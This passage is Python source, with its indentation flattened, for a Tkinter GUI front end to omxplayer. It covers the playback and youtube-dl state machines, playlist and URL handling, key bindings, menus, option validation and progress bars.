self.play_next_track_signal = False
# playing a track signals
self.stop_required_signal=False
self.play_state=self._OMX_CLOSED
self.quit_sent_signal = False # signal that q has been sent
self.paused=False
# playing a track signals
self.ytdl_state=self._YTDL_CLOSED
self.quit_ytdl_sent_signal = False # signal that q has been sent
# whether omxplayer dbus is connected
self.dbus_connected = False
self.start_track_index = None
self.omx = None
self.autolyrics = None
# kick off the state machine by playing a track
def play(self):
#initialise all the state machine variables
if self.play_state==self._OMX_CLOSED and self.playlist.track_is_selected():
self.ytdl.reset_subtitle_attributes()
self.iteration = 0 # for debugging
self.paused = False
self.stop_required_signal=False # signal that user has pressed stop
self.quit_sent_signal = False # signal that q has been sent
self.playing_location = self.playlist.selected_track_location
self.play_state=self._OMX_STARTING
self.dbus_connected = False
self._cued = False
            #play the selected track
index = self.playlist.selected_track_index()
self.display_selected_track(index)
self.start_omx(self.playlist.selected_track_location)
self.play_state_machine()
self.set_play_button_state(1)
def play_state_machine(self):
# self.monitor ("******Iteration: " + str(self.iteration))
self.iteration +=1
if self.play_state == self._OMX_CLOSED:
self.monitor(" State machine: " + self.play_state)
self.what_next()
return
elif self.play_state == self._OMX_STARTING:
self.monitor(" State machine: " + self.play_state)
# if omxplayer is playing the track change to play state
if self.omx and self.omx.start_play_signal==True:
self.monitor(" <start play signal received from omx")
self.omx.start_play_signal=False
self.play_state=self._OMX_PLAYING
self.monitor(" State machine: omx_playing started")
self.dbus_connected = self.omx.init_dbus_link()
self.show_progress_bar()
self.set_progress_bar()
if self.media_is_video() and not self.options.forbid_windowed_mode:
self.create_vprogress_bar()
if self.dbus_connected:
self.omx.set_aspect_mode(OMXPlayer.AM_LETTERBOX)
if self.options.cue_track_mode:
self.toggle_pause()
if self.options.find_lyrics:
self.grab_lyrics()
else:
if self.ytdl_state == self._YTDL_CLOSED:
self.play_state=self._OMX_CLOSED
self.monitor(" youtube-dl failed, stopping omx state machine")
else:
self.monitor(" OMXPlayer did not start yet.")
self.root.after(350, self.play_state_machine)
elif self.play_state == self._OMX_PLAYING :
# service any queued stop signals
if self.stop_required_signal==True :#or (self.omx and (self.omx.end_play_signal or self.omx.failed_play_signal)):
self.monitor(" Service stop required signal")
self.stop_omx()
self.stop_required_signal=False
else:
# quit command has been sent or omxplayer reports it is terminating so change to ending state
if self.quit_sent_signal == True or self.omx.end_play_signal== True or not self.omx.is_running():
if self.quit_sent_signal:
self.monitor(" quit sent signal received")
self.quit_sent_signal = False
if self.omx.end_play_signal:
self.monitor(" <end play signal received")
self.monitor(" <end detected at: " + str(self.omx.position))
self.play_state =self._OMX_ENDING
self.reset_progress_bar()
if self.media_is_video():
self.destroy_vprogress_bar()
self.do_playing()
self.root.after(350, self.play_state_machine)
elif self.play_state == self._OMX_ENDING:
self.monitor(" State machine: " + self.play_state)
# if spawned process has closed can change to closed state
self.monitor (" State machine : is omx process running - " + str(self.omx.is_running()))
if self.omx.is_running() ==False:
#if self.omx.end_play_signal==True: #this is not as safe as process has closed.
self.monitor(" <omx process is dead")
self.play_state = self._OMX_CLOSED
self.dbus_connected = False
self.do_ending()
if self.autolyrics:
self.autolyrics.destroy()
self.autolyrics = None
self.root.after(350, self.play_state_machine)
# do things in each state
def do_playing(self):
# we are playing so just update time display
# self.monitor("Position: " + str(self.omx.position))
if self.paused == False:
time_string = self.time_string(self.omx.position)
if self.omx.timenf:
time_string += "\n/ " + self.time_string(self.omx.timenf['duration'])
self.display_time.set(time_string)
if abs(self.omx.position - self.progress_bar_var.get()) > self.progress_bar_step_rate:
self.set_progress_bar_step()
if self.options.cue_track_mode and not self._cued and self.omx.timenf and self.omx.position >= self.omx.timenf['duration'] - 1:
self.toggle_pause()
self._cued = True
else:
self.display_time.set(_("Paused"))
def do_starting(self):
self.display_time.set(_("Starting"))
return
def do_ending(self):
# we are ending so just write End to the time display
self.display_time.set(_("End"))
self.hide_progress_bar()
    # respond to asynchronous user input and send signals if necessary
def play_track(self):
""" respond to user input to play a track, ignore it if already playing
needs to start playing and not send a signal as it is this that triggers the state machine.
"""
self.monitor(">play track received")
if self.play_state == self._OMX_CLOSED:
self.start_track_index = self.playlist.selected_track_index()
self.play()
elif self.play_state == self._OMX_PLAYING and not (self.stop_required_signal or self.break_required_signal):
self.toggle_pause()
def play_track_by_index(self, track_index=0):
if self.play_state == self._OMX_CLOSED:
self.playlist.select(track_index)
self.play_track()
return
elif (track_index == self.start_track_index
and self.play_state == self._OMX_PLAYING):
self.toggle_pause()
return
self.stop_track()
def play_after():
self.playlist.select(track_index)
self.play_track()
self.root.after(1200, play_after)
def skip_to_next_track(self):
# send signals to stop and then to play the next track
if self.play_state == self._OMX_PLAYING:
self.monitor(">skip to next received")
self.monitor(">stop received for next track")
self.stop_required_signal=True
self.play_next_track_signal=True
def skip_to_previous_track(self):
# send signals to stop and then to play the previous track
if self.play_state == self._OMX_PLAYING:
self.monitor(">skip to previous received")
self.monitor(">stop received for previous track")
self.stop_required_signal=True
self.play_previous_track_signal=True
def stop_track(self):
# send signals to stop and then to break out of any repeat loop
if self.play_state == self._OMX_PLAYING:
self.monitor(">stop received")
self.start_track_index=None
self.stop_required_signal=True
self.break_required_signal=True
self.hide_progress_bar()
self.set_play_button_state(0)
def toggle_pause(self):
"""pause clicked Pauses or unpauses the track"""
if self.play_state == self._OMX_PLAYING:
self.send_command('p')
if self.paused == False:
self.paused=True
self.set_play_button_state(0)
else:
if(self.options.cue_track_mode and self._cued):
self.stop_omx()
self.paused=False
self.set_play_button_state(1)
def set_play_button_state(self, state):
if state == 0:
self.play_button['text'] = _('Play')
elif state == 1:
self.play_button['text'] = _('Pause')
def volminusplus(self, event):
if event.x < event.widget.winfo_width()/2:
self.volminus()
else:
self.volplus()
def volplus(self):
self.send_command('+')
def volminus(self):
self.send_command('-')
def time_string(self,secs):
minu = int(secs/60)
sec = secs-(minu*60)
return str(minu)+":"+str(int(sec))
def what_next(self):
if self.break_required_signal==True:
self.hide_progress_bar()
self.monitor("What next, break_required so exit")
self.set_play_button_state(0)
def break_required_signal_false():
self.break_required_signal=False
self.root.after(650, break_required_signal_false)
# fall out of the state machine
return
elif self.play_next_track_signal ==True:
# called when state machine is in the omx_closed state in order to decide what to do next.
self.monitor("What next, skip to next track")
self.play_next_track_signal=False
if self.options.mode=='shuffle':
self.random_next_track()
self.play()
else:
self.select_next_track()
self.play()
return
elif self.play_previous_track_signal ==True:
self.monitor("What next, skip to previous track")
self.select_previous_track()
self.play_previous_track_signal=False
self.play()
return
elif self.options.mode=='single':
self.monitor("What next, single track so exit")
self.set_play_button_state(0)
# fall out of the state machine
return
elif self.options.mode=='repeat':
self.monitor("What next, Starting repeat track")
self.play()
return
elif 'playlist' in self.options.mode:
if not 'repeat' in self.options.mode and self.start_track_index == self.playlist.length() - 1:
self.stop_required_signal=True
self.set_play_button_state(0)
self.monitor("What next, reached end of playlist, so exit")
return
self.monitor("What next, Starting playlist track")
self.select_next_track()
self.play()
return
elif self.options.mode=='shuffle':
self.monitor("What next, Starting random track")
self.random_next_track()
self.play()
return
# ***************************************
# YTDL STATE MACHINE
# ***************************************
def go_ytdl(self, url, playlist=False):
self.quit_ytdl_sent_signal = False
if self.ytdl_state in (self._YTDL_CLOSED, self._YTDL_ENDING):
self.ytdl_state=self._YTDL_STARTING
self.ytdl.start_signal=True
youtube_media_format = self.options.youtube_media_format
if not playlist:
self.ytdl.retrieve_media_url(url, youtube_media_format)
else:
self.ytdl.retrieve_youtube_playlist(url, youtube_media_format)
if self.ytdl_state==self._YTDL_STARTING:
self.ytdl_state_machine()
def go_ytdl_subtitles(self, track):
self.ytdl.download_subtitles(self.options.subtitles_lang, track[2])
while (not self.ytdl.subtitle_ready_signal and
not self.ytdl.download_subtitle_failed_signal):
sleep(0.2)
self.start_omx(track[0], skip_ytdl_check = True)
def ytdl_state_machine(self):
if self.ytdl_state == self._YTDL_CLOSED:
self.monitor(" Ytdl state machine: " + self.ytdl_state)
return
elif self.ytdl_state == self._YTDL_STARTING:
self.monitor(" Ytdl state machine: " + self.ytdl_state)
if self.ytdl.start_signal==True:
self.monitor(" <start play signal received from youtube-dl")
self.ytdl.start_signal=False
self.ytdl_state=self._YTDL_WORKING
self.monitor(" Ytdl state machine: "+self.ytdl_state)
self.root.after(500, self.ytdl_state_machine)
elif self.ytdl_state == self._YTDL_WORKING:
try:
if len(self.ytdl.finished_processes):
for url in self.ytdl.finished_processes:
process = self.ytdl.finished_processes[url]
self.treat_ytdl_result(url, process[1])
self.ytdl.finished_processes = {}
if not self.ytdl.is_running():
self.ytdl_state = self._YTDL_ENDING
except Exception:
log.logException()
sys.exc_clear()
self.root.after(500, self.ytdl_state_machine)
elif self.ytdl_state == self._YTDL_ENDING:
self.ytdl.reset_processes()
self.monitor(" Ytdl state machine: " + self.ytdl_state)
self.monitor(" Ytdl state machine: is process running - " + str(self.ytdl.is_running()))
self.ytdl_state = self._YTDL_CLOSED
self.root.after(500, self.ytdl_state_machine)
def treat_ytdl_result(self, url, res):
if res[0] == 1:
try:
result = json.loads(res[1])
except Exception:
log.logException()
sys.exc_clear()
self.remove_waiting_track(url)
return
if 'entries' in result:
self.treat_youtube_playlist_data(result)
else:
self.treat_video_data(url, result)
else:
self.remove_waiting_track(url)
if self.play_state==self._OMX_STARTING:
self.quit_sent_signal = True
self.display_selected_track_title.set(self.YTDL_MSGS[res[1]])
self.root.after(3000, lambda: self.display_selected_track())
return
def treat_video_data(self, url, data):
media_url = self._treat_video_data(data, data['extractor'])
if not media_url and self.options.youtube_video_quality == "small":
media_url = self._treat_video_data(data, data['extractor'], "medium")
if not media_url:
media_url = data['url']
tracks = self.playlist.waiting_tracks()
if tracks:
for track in tracks:
if track[1][0] == url:
self.playlist.replace(track[0],[media_url, data['title'], url])
if self.play_state == self._OMX_STARTING:
self.start_omx(media_url,skip_ytdl_check=True)
self.refresh_playlist_display()
self.playlist.select(track[0])
break
def treat_youtube_playlist_data(self, data):
for entry in data['entries']:
media_url = self._treat_video_data(entry, data['extractor'])
if not media_url and self.options.youtube_video_quality == "small":
media_url = self._treat_video_data(entry, data['extractor'], "medium")
if not media_url:
media_url = entry['url']
self.playlist.append([media_url,entry['title'],''])
self.playlist.select(self.playlist.length() - len(data['entries']))
self.refresh_playlist_display()
self.root.after(3000, lambda: self.display_selected_track())
def _treat_video_data(self, data, extractor, force_quality=False):
media_url = None
media_format = self.options.youtube_media_format
quality = self.options.youtube_video_quality if not force_quality else force_quality
if extractor != "youtube" or (media_format == "mp4" and quality == "high"):
media_url = data['url']
else:
preference = -100
for format in data['formats']:
if ((media_format == format['ext'] == "m4a" and
((quality == "high" and format['abr'] == 256) or
(quality in ("medium", "small") and format['abr'] == 128))) or
(media_format == format['ext'] == "mp4" and
quality == format['format_note'])):
if 'preference' in format and format['preference'] > preference:
preference = format['preference']
media_url = format['url']
else:
media_url = format['url']
return media_url
def ytdl_update_messages_loop(self):
if not self.ytdl.updating_signal:
if self.ytdl.updated_signal:
tkMessageBox.showinfo("",_("youtube-dl has been updated."))
elif self.ytdl.update_failed_signal:
tkMessageBox.showinfo("",_("Failed to update youtube-dl."))
else:
if self.ytdl.password_requested_signal and not self.ytdl.has_password_signal:
                password = tkSimpleDialog.askstring("", _("youtube-dl needs to be updated.\nPlease enter your password."), parent=self.root, show="*")
if password: self.ytdl.set_password(password)
else: return
self.root.after(500, self.ytdl_update_messages_loop)
# ***************************************
# WRAPPER FOR JBAITER'S PYOMXPLAYER
# ***************************************
def start_omx(self, track, skip_ytdl_check=False):
""" Loads and plays the track"""
if not skip_ytdl_check and self.ytdl.whether_to_use_youtube_dl(track):
self.go_ytdl(track)
index = self.playlist.selected_track_index()
track = self.playlist.selected_track()
track = (track[0], self.YTDL_WAIT_TAG+track[1])
self.playlist.replace(index, track)
self.playlist.select(index)
self.refresh_playlist_display()
return
if ("http" in track and
self.options.omx_subtitles and
not self.ytdl.subtitle_ready_signal and
not self.ytdl.download_subtitle_failed_signal):
track = self.playlist.selected_track()
self.go_ytdl_subtitles(track)
return
track= "'"+ track.replace("'","'\\''") + "'"
opts= (self.options.omx_user_options + " " + self.options.omx_audio_output + " " +
" --vol " + str(self.get_mB()) + " " + self.options.omx_subtitles + " " +
(" --subtitles " + self.ytdl._YTLAUNCH_SUB_DIR + "/subtitle." + self.options.subtitles_lang + ".srt" if self.ytdl.subtitle_ready_signal else ""))
#print(639, "self.media_is_video()",self.media_is_video())
#print(hasattr(self,"omx"), hasattr(self.omx, "video"), len(self.omx.video) > 0)
#if self.media_is_video():
if not self.options.forbid_windowed_mode and not self.options.full_screen and '--win' not in opts:
mc = self.RE_COORDS.match(self.options.windowed_mode_coords)
mg = self.RE_RESOLUTION.match(self.options.windowed_mode_resolution)
if mc and mg:
w, h, x, y = [int(v) for v in mg.groups()+mc.groups()]
opts += ' --win %d,%d,%d,%d' % (x, y, x+w, y+h)
if not '--aspect-mode' in opts:
opts += ' --aspect-mode letterbox'
if not '--no-osd' in opts:
opts += ' --no-osd'
self.monitor('starting omxplayer with args: "%s"' % (opts,))
self.omx = OMXPlayer(track, args=opts, start_playback=True)
self.monitor(" >Play: " + track + " with " + opts)
def stop_omx(self):
if self.play_state == self._OMX_PLAYING:
self.monitor(" >Send stop to omx")
self.omx.stop()
else:
self.monitor (" !>stop not sent to OMX because track not playing")
def send_command(self,command):
if command in "+=-pz12jkionms" and self.play_state == self._OMX_PLAYING:
self.monitor(" >Send Command: "+command)
self.omx.send_command(command)
if self.dbus_connected and command in ('+' , '=', '-'):
sleep(0.1)
try:
self.set_volume_bar_step(int(self.vol2dB(self.omx.volume())+self.volume_normal_step))
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed to set volume bar step")
return True
else:
if command in "+=":
self.set_volume_bar_step(self.volume_var.get() + 3)
elif command == '-':
self.set_volume_bar_step(self.volume_var.get() - 3)
self.monitor (" !>Send command: illegal control or track not playing")
return False
def send_special(self,command):
if self.play_state == self._OMX_PLAYING:
self.monitor(" >Send special")
self.omx.send_command(command)
return True
else:
self.monitor (" !>Send special: track not playing")
return False
# ***************************************
# INIT
# ***************************************
def __init__(self, options):
# initialise options class and do initial reading/creation of options
self.options=options
if self.options.debug:
log.setLogFile(self.options.log_file)
log.enableLogging()
self.monitor('started logging to file "%s"' % (self.options.log_file,))
else:
log.disableLogging()
#initialise the play state machine
self.init_play_state_machine()
# start and configure ytdl object
self.ytdl = Ytdl(self.options,
lambda: tkMessageBox.showinfo("",_("youtube-dl binary is not in the path configured in the Options, please check your configuration")))
#create the internal playlist
self.playlist = PlayList(self.YTDL_WAIT_TAG)
#root is the Tkinter root widget
self.root = tk.Tk()
icon_photo = tk.PhotoImage(file=os.path.dirname(os.path.realpath(__file__)) + '/ico/48x48.png')
self.root.call('wm', 'iconphoto', self.root._w, icon_photo)
#self.root.iconphoto()
self.root.title("GUI for OMXPlayer")
self.root.configure(background='grey')
# width, height, xoffset, yoffset
self.root.geometry(self.options.geometry)
self.root.resizable(True,True)
OMXPlayer.set_omx_location(self.options.omx_location)
# bind some display fields
self.filename = tk.StringVar()
self.display_selected_track_title = tk.StringVar()
self.display_time = tk.StringVar()
self.volume_var = tk.IntVar()
self.progress_bar_var = tk.IntVar()
self.root.bind("<Configure>", self.save_geometry)
#Keys
self.root.bind("<Left>", self.key_left)
self.root.bind("<Right>", self.key_right)
self.root.bind("<Up>", self.key_up)
self.root.bind("<Down>", self.key_down)
self.root.bind("<Shift-Right>", self.key_shiftright) #forward 600
self.root.bind("<Shift-Left>", self.key_shiftleft) #back 600
self.root.bind("<Control-Right>", self.key_ctrlright) #next track
self.root.bind("<Control-Left>", self.key_ctrlleft) #previous track
self.root.bind("<Control-v>", self.add_url)
self.root.bind("<Escape>", self.key_escape)
self.root.bind("<F11>", self.toggle_full_screen)
self.root.bind("<Control_L>", self.vwindow_start_resize)
self.root.bind("<KeyRelease-Control_L>", self.vwindow_stop_resize)
self.root.bind('<Button-3>', self.add_url)
self.root.bind("<Key>", self.key_pressed)
self.style = Style()
self.style.theme_use("alt")
# define menu
menubar = Menu(self.root)
filemenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Track'), menu = filemenu)
filemenu.add_command(label=_('Add'), command = self.add_track)
filemenu.add_command(label=_('Add Dir'), command = self.add_dir)
filemenu.add_command(label=_('Add Dirs'), command = self.add_dirs)
filemenu.add_command(label=_('Add URL'), command = self.add_url)
filemenu.add_command(label=_('Youtube search'), command = self.youtube_search)
filemenu.add_command(label=_('Remove'), command = self.remove_track)
filemenu.add_command(label=_('Edit'), command = self.edit_track)
listmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Playlists'), menu = listmenu)
listmenu.add_command(label=_('Open playlist'), command = self.open_list_dialog)
listmenu.add_command(label=_('Save playlist'), command = self.save_list)
listmenu.add_command(label=_('Load Youtube playlist'), command = self.load_youtube_playlist)
listmenu.add_command(label=_('Clear'), command = self.clear_list)
omxmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label='OMX', menu = omxmenu)
omxmenu.add_command(label=_('Track Info'), command = self.show_omx_track_info)
optionsmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Options'), menu = optionsmenu)
optionsmenu.add_command(label=_('Edit'), command = self.edit_options)
helpmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Help'), menu = helpmenu)
helpmenu.add_command(label=_('Help'), command = self.show_help)
helpmenu.add_command(label=_('About'), command = self.about)
self.root.config(menu=menubar)
# define buttons
# add track button
Button(self.root, width = 5, height = 1, text=_('Add'),
foreground='black', command = self.add_track,
background="light grey").grid(row=0, column=1, rowspan=2, sticky=N+W+E+S)
# add dir button
Button(self.root, width = 5, height = 1, text=_('Add Dir'),
foreground='black', command = self.add_dir,
background="light grey").grid(row=0, column=2, rowspan=2, sticky=N+W+E+S)
# add url button
Button(self.root, width = 5, height = 1, text=_('Add URL'),
foreground='black', command = self.add_url,
background="light grey").grid(row=0, column=3, rowspan=2, sticky=N+W+E+S)
# open list button
Button(self.root, width = 5, height = 1, text=_('Open List'),
foreground='black', command = self.open_list_dialog,
background="light grey").grid(row=0, column=4, rowspan=2, sticky=N+W+E+S)
# save list button
Button(self.root, width = 5, height = 1, text =_('Save List'),
foreground='black', command = self.save_list,
background='light grey').grid(row=0, column=5, rowspan=2, sticky=N+W+E+S)
# clear list button;
Button(self.root, width = 5, height = 1, text =_('Clear List'),
foreground='black', command = self.clear_list,
background='light grey').grid(row=0, column=6, rowspan=2, sticky=N+W+E+S)
# play/pause button
self.play_button = Button(self.root, width = 5, height = 1, text=_('Play'),
foreground='black', command = self.play_track,
background="light grey")
self.play_button.grid(row=7, column=1, sticky=N+W+E+S)
# stop track button
Button(self.root, width = 5, height = 1, text=_('Stop'),
foreground='black', command = self.stop_track,
background="light grey").grid(row=7, column=2, sticky=N+W+E+S)
# previous track button
Button(self.root, width = 5, height = 1, text=_('Previous'),
foreground='black', command = self.skip_to_previous_track,
background="light grey").grid(row=7, column=3, sticky=N+W+E+S)
# next track button
Button(self.root, width = 5, height = 1, text=_('Next'),
foreground='black', command = self.skip_to_next_track,
background="light grey").grid(row=7, column=4, sticky=N+W+E+S)
# vol button
minusplus_button = Button(self.root, width = 5, height = 1, text = '- Vol +',
foreground='black', background='light grey')
minusplus_button.grid(row=7, column=5, sticky=N+W+E+S)#, sticky=E)
minusplus_button.bind("<ButtonRelease-1>", self.volminusplus)
# define display of file that is selected
Label(self.root, font=('Comic Sans', 10),
fg = 'black', wraplength = 400, height = 2,
textvariable=self.display_selected_track_title,
background="grey").grid(row=2, column=1, columnspan=6, sticky=N+W+E)
# define time/status display for selected track
Label(self.root, font=('Comic Sans', 9),
fg = 'black', wraplength = 100,
textvariable=self.display_time,
background="grey").grid(row=2, column=6, columnspan=1, sticky=N+W+E+S)
# define display of playlist
self.track_titles_display = Listbox(self.root, background="white", height = 15,
foreground="black", takefocus=0)
self.track_titles_display.grid(row=3, column=1, columnspan=7,rowspan=3, sticky=N+S+E+W)
self.track_titles_display.bind("<ButtonRelease-1>", self.select_track)
self.track_titles_display.bind("<Delete>", self.remove_track)
self.track_titles_display.bind("<Return>", self.key_return)
self.track_titles_display.bind("<Double-1>", self.select_and_play)
# scrollbar for displaylist
scrollbar = Scrollbar(self.root, command=self.track_titles_display.yview, orient=tk.VERTICAL)
scrollbar.grid(row = 3, column=6, rowspan=3, sticky=N+S+E)
self.track_titles_display.config(yscrollcommand=scrollbar.set)
# progress bar
self.style.configure("progressbar.Horizontal.TProgressbar", foreground='medium blue', background='medium blue')
self.progress_bar = Progressbar(orient=HORIZONTAL, length=self.progress_bar_total_steps, mode='determinate',
maximum=self.progress_bar_total_steps, variable=self.progress_bar_var,
style="progressbar.Horizontal.TProgressbar")
self.progress_bar.grid(row=6, column=1, columnspan=6, sticky=N+W+E+S)
self.progress_bar.grid_remove()
self.progress_bar.bind("<ButtonRelease-1>", self.set_track_position)
self.progress_bar_var.set(0)
        # volume bar; the volume meter ranges from 0.0 to 16.0, with 1.0 being normal volume
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='cornflower blue', background='cornflower blue')
self.volume_bar = Progressbar(orient=HORIZONTAL, length=self.volume_max, mode='determinate',
maximum=self.volume_max, variable=self.volume_var,
style="volumebar.Horizontal.TProgressbar")
self.volume_bar.grid(row=7, column=6, stick=W+E)
self.volume_bar.bind("<ButtonRelease-1>", self.set_volume_bar)
self.volume_var.set(self.volume_normal_step)
# configure grid
self.root.grid_columnconfigure(1, weight=1)
self.root.grid_columnconfigure(2, weight=1)
self.root.grid_columnconfigure(3, weight=1)
self.root.grid_columnconfigure(4, weight=1)
self.root.grid_columnconfigure(5, weight=1)
self.root.grid_columnconfigure(6, weight=1)
self.root.grid_rowconfigure(1, weight=0)
self.root.grid_rowconfigure(2, weight=0)
self.root.grid_rowconfigure(3, weight=1, minsize=40)
self.root.grid_rowconfigure(4, weight=0)
self.root.grid_rowconfigure(5, weight=0)
self.root.grid_rowconfigure(6, weight=0)
self.root.grid_rowconfigure(7, weight=0)
# if files were passed in the command line, add them to the playlist
for f in sys.argv[1:]:
if os.path.isfile(f) and self.is_file_supported(f):
self.file = f
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
elif os.path.isfile(f) and f[f.rfind('.')+1:]=="csv":
self._open_list(f)
if self.playlist.length() > 0 and self.options.autoplay:
if self.options.mode=='shuffle':
self.random_next_track()
else:
self.select_track(False)
self.play_track()
self.dnd = DnD(self.root)
self.dnd.bindtarget(self.root, 'text/uri-list', '<Drop>', self.add_drag_drop)
if self.options.ytdl_update:
self.ytdl.check_for_update()
self.ytdl_update_messages_loop()
def shutdown(self):
self.root.quit()
self.ytdl.quit()
if self.omx is not None:
self.omx.stop()
self.omx.kill()
# ***************************************
# MISCELLANEOUS
# ***************************************
def edit_options(self):
"""edit the options then read them from file"""
eo = OptionsDialog(self.root, self.options.options_file,_('Edit Options'))
self.options.read(self.options.options_file)
self.ytdl.set_options(self.options)
OMXPlayer.set_omx_location(self.options.omx_location)
def show_help (self):
tkMessageBox.showinfo(_("Help"),
_("To control playing, type a key\np - pause/play\nspacebar - pause/play\nq - quit\n")
+ _("+ - increase volume\n- - decrease volume\nz - tv show info\n1 - reduce speed\no - forward a chapter\n")
+ _("2 - increase speed\nj - previous audio index\nk - next audio index\ni - back a chapter\nn - previous subtitle index\n")
+ _("m - next subtitle index\ns - toggle subtitles\n>cursor - seek forward 30\n<cursor - seek back 30\n")
+ _("SHIFT >cursor - seek forward 600\nSHIFT <cursor - seek back 600\nCTRL >cursor - next track\nCTRL <cursor - previous track\n")
+ _("F11 - toggle full screen/windowed mode\n\nFor more help, consult the 'Operation' section of the README file"))
def about (self):
tkMessageBox.showinfo(_("About"),_("GUI for omxplayer using jbaiter's pyomxplayer wrapper\n")
+((_("Version dated: %s \nAuthor:\n Ken Thompson - KenT2\n")) % datestring)
+_("Contributors:\n eysispeisi\n heniotierra\n krugg\n popiazaza"))
def monitor(self,text):
if self.options.debug:
log.debug(text)
# Key Press callbacks
def key_right(self,event):
self.send_special('\x1b\x5b\x43')
self.monitor("Seek forward 30")
def key_left(self,event):
self.send_special('\x1b\x5b\x44')
self.monitor("Seek back 30")
def key_shiftright(self,event):
self.send_special('\x1b\x5b\x42')
self.monitor("Seek forward 600")
def key_shiftleft(self,event):
self.send_special('\x1b\x5b\x41')
self.monitor("Seek back 600")
def key_ctrlright(self,event):
self.skip_to_next_track()
def key_ctrlleft(self,event):
self.skip_to_previous_track()
def key_up(self,event):
self.select_previous_track()
def key_down(self,event):
self.select_next_track()
def key_escape(self,event):
self.stop_track()
def key_return(self,event):
self.stop_track()
def play_aux():
self.start_track_index = self.playlist.selected_track_index()
self.play()
self.root.after(1500, play_aux)
def key_pressed(self,event):
char = event.char
if char=='':
return
elif char in ('p', ' ', '.'):
self.play_track()
return
elif char=='q':
self.stop_track()
return
else:
self.send_command(char)
return
def grab_lyrics(self):
track = self.playlist.selected_track()
track_title = track[1]
if ('title' in self.omx.misc and
self.omx.misc['title'] and
'artist' in self.omx.misc and
self.omx.misc['artist']):
track_title = self.omx.misc['artist'] + '-' + self.omx.misc['title']
self.autolyrics = AutoLyrics(self.root, self.options.autolyrics_coords, self._save_autolyrics_coords, track_title)
def save_geometry(self, *sec):
self.options.geometry = self.root.geometry()
self.options.save_state()
def _save_autolyrics_coords(self, *event):
x = self.autolyrics.winfo_x()
y = self.autolyrics.winfo_y()
self.options.autolyrics_coords = ("+" if x>=0 else "-")+str(x)+("+" if y>=0 else "-")+str(y)
def set_option(self, option, value):
boolean = ["0", "1"]
allowed_options_values = {
"omx_user_options": "str",
"omx_location": "str",
"ytdl_location": "str",
"omx_audio_output": ["hdmi","local","both","alsa"],
"mode": ["single", "repeat","playlist","repeat playlist", "shuffle"],
"debug": ["on", "off"],
"youtube_media_format": ["mp4", "m4a"],
"download_media_url_upon": ["add","play"],
"youtube_video_quality": ["small", "medium","high"],
"windowed_mode_coords": self.RE_COORDS,
"windowed_mode_resolution": self.RE_RESOLUTION,
"autolyrics_coords": self.RE_COORDS,
"forbid_windowed_mode": boolean,
"cue_track_mode": boolean,
"autoplay": boolean,
"find_lyrics": boolean,
"full_screen": boolean
}
try:
allowed_option_values = allowed_options_values[option]
except KeyError:
raise KeyError("Option " + option + " is invalid")
option_type = str(type(allowed_option_values))
if (allowed_option_values == "str" or
("list" in option_type and value in allowed_option_values) or
("SRE_Pattern" in option_type and allowed_option_values.match(value) != None)):
if allowed_option_values == boolean:
value = int(value)
setattr(self.options, option, value)
self.options.save_state()
self.options.read(self.options.options_file)
if option == "ytdl_location":
                self.ytdl.set_options(self.options)
elif option=="omx_location":
OMXPlayer.set_omx_location(self.options.omx_location)
else: raise AttributeError("Option value does not match an expected value or pattern")
# ******************************************
# PROGRESS BAR CALLBACKS
# ******************************************
def set_progress_bar(self):
try:
self.progress_bar_step_rate = self.omx.timenf['duration']/self.progress_bar_total_steps
except Exception:
log.logException()
sys.exc_clear()
return False
def show_progress_bar(self):
self.progress_bar.grid()
def hide_progress_bar(self):
self.progress_bar.grid_remove()
def reset_progress_bar(self):
self.progress_bar_var.set(0)
def set_track_position(self,event):
if not self.dbus_connected: return
new_track_position = self.progress_bar_step_rate * ((event.x * self.progress_bar_total_steps)/event.widget.winfo_width())
try:
self.omx.set_position(new_track_position)
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed to set track position")
self.focus_root()
def set_progress_bar_step(self):
try:
self.progress_bar_var.set(int((self.omx.position * self.progress_bar_total_steps)/self.omx.timenf['duration']))
except Exception:
log.logException()
sys.exc_clear()
self.monitor('Error trying to set progress bar step')
# ******************************************
# VIDEO WINDOW FUNCTIONS
# ******************************************
def create_vprogress_bar(self):
screenres = self.get_screen_res()
vsize = self.omx.video['dimensions']
self.vprogress_bar_window = Toplevel(master=self.root)
self.vprogress_bar_frame = Frame(self.vprogress_bar_window, bg="black")
self.vprogress_bar_frame.pack(fill=BOTH,side=TOP, expand=True)
        #define response to main window closing
self.vprogress_bar_window.protocol ("WM_DELETE_WINDOW", self.vprogress_bar_window.destroy)
self.vprogress_bar_window.video_height = screenres[1]
self.vprogress_bar_window.video_width = int(vsize[0] * (screenres[1] / float(vsize[1])))
self.vprogress_bar_window.resizing = 0
if self.vprogress_bar_window.video_width > screenres[0] + 20:
self.vprogress_bar_window.video_width = screenres[0]
self.vprogress_bar_window.video_height = int(vsize[1] * (screenres[0] / float(vsize[0])))
if self.options.full_screen:
geometry = "%dx%d-0-0" % screenres
else:
coords = self.options.windowed_mode_coords
coords_m = self.RE_COORDS.match(coords)
if coords_m is None or int(coords_m.group(1))>screenres[0] or int(coords_m.group(2))>screenres[1]:
coords = "+200+200"
geometry = self.options.windowed_mode_resolution + coords
self.vprogress_bar_window.geometry(geometry)
self.vprogress_bar_window.overrideredirect(1)
self.vprogress_bar_window.resizable(True,True)
self.vprogress_bar = Progressbar(self.vprogress_bar_window, orient=HORIZONTAL, length=self.progress_bar_total_steps, mode='determinate',
maximum=self.progress_bar_total_steps, variable=self.progress_bar_var,
style="progressbar.Horizontal.TProgressbar")
self.vprogress_bar.pack(in_=self.vprogress_bar_frame, fill=BOTH,side=BOTTOM)
self.root.update()
self.vprogress_bar.bind("<ButtonRelease-1>", self.set_track_position)
self.vprogress_bar_window.bind("<Configure>", self.move_video)
self.vprogress_bar_window.bind("<ButtonPress-1>", self.vwindow_start_move)
self.vprogress_bar_window.bind("<ButtonRelease-1>", self.vwindow_stop_move)
